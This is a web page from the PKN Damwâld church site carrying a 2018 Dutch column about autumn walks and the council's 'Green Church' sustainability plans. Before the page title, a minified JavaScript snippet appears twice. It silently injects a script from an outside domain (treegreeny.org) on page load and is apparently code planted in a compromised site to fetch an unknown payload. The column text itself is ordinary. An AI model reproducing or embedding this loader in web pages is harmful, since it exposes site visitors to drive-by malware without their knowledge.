;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Herfstwandeling - PKN Damwâld

Herfstwandeling

Gepubliceerd op: vrijdag 26 oktober 2018

Er is weinig mooier dan op een mooie herfstdag een boswandeling te maken. Het is er deze herfst nog niet echt van gekomen, maar staat nog wel op mijn lijstje. De herfst heeft iets wat me blij maakt, met de prachtige gekleurde bladeren, het ritselen van die stapels die al op de grond zijn gevallen, de geur van aarde en de keur aan mooie paddenstoelen, om maar wat te noemen.
De herfst laat je genieten van het zachte nazomerlicht, de wind in je haren. Je bent je bewust van het moois van de aarde. Een groot geschenk waar we zuinig op moeten zijn. Dat is ook een onderwerp waar we nu met de kerkenraad over nadenken: Groene Kerk. Wat kunnen we als kerk doen aan het zorgen voor een duurzaam gebruik van materialen, ook met het oog op goed rentmeesterschap van de aarde die God ons heeft gegeven. En hoe vertalen we dat in het leven van alle dag, en de taken die wij als kerkgemeenschap voor ons zien? Strekt het zich uit tot het steunen van goede doelen, of valt ook het omkijken naar de medemens hier onder? Doen we genoeg aan groene energie, kunnen we onszelf en de mensen om ons heen daar (nog) bewuster van maken?
We willen proberen daar in het beleidsplan voor de komende jaren aandacht aan te schenken. Het moet nog wel vorm krijgen, maar het genieten van een mooie herfstdag is vast en zeker een goede inspiratiebron!

Met dank aan de auteur van de foto: https://nl.freepik.com/vrije-photo/herfst-landschap_1253906.htm’>Designed by Photoangel

Columnist:Janet

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns